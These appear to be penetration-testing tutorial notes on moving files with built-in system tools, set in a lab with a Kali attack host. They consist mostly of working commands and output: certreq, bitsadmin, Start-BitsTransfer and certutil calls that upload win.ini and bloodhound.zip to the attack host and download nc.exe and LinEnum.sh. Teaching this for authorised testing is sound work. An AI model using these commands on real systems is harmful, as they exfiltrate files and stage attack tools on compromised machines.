To search for download and upload functions in LOLBAS we can use
We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.
Upload win.ini to our attackhost
C:\xyz> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
This will send the file to our Netcat session, and we can copy-paste its contents.
File Received in our Netcat Session
neutron@kali[/kali]$ sudo nc -lvnp 80 listening on [any] 80 ... connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819 POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/json User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1) Content-Length: 92 Host: 192.168.49.128 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
To search for the download and upload function in GTFOBins for Linux Binaries, we can use
+file download or
We need to create a certificate and start a server in our attackhost.
Create Certificate in our attackhost
neutron@kali[/kali]$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key .......................................................................................................+++++ ................+++++ writing new private key to 'key.pem' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) : Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) : Common Name (e.g. server FQDN or YOUR name) : Email Address :
Stand up the Server in our attackhost
neutron@kali[/kali]$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
With the server running, we need to download the file from the compromised machine.
neutron@kali[/kali]$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
Other common Living off the Land tools
Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user's foreground work.
File Download with Bitsadmin
PS C:\xyz> bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
PS C:\xyz> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"
PS C:\xyz> Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential LEGALCORP\svc-sql
Available in all Windows versions, serving as a defacto
wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
Download a File with Certutil
C:\xyz> certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe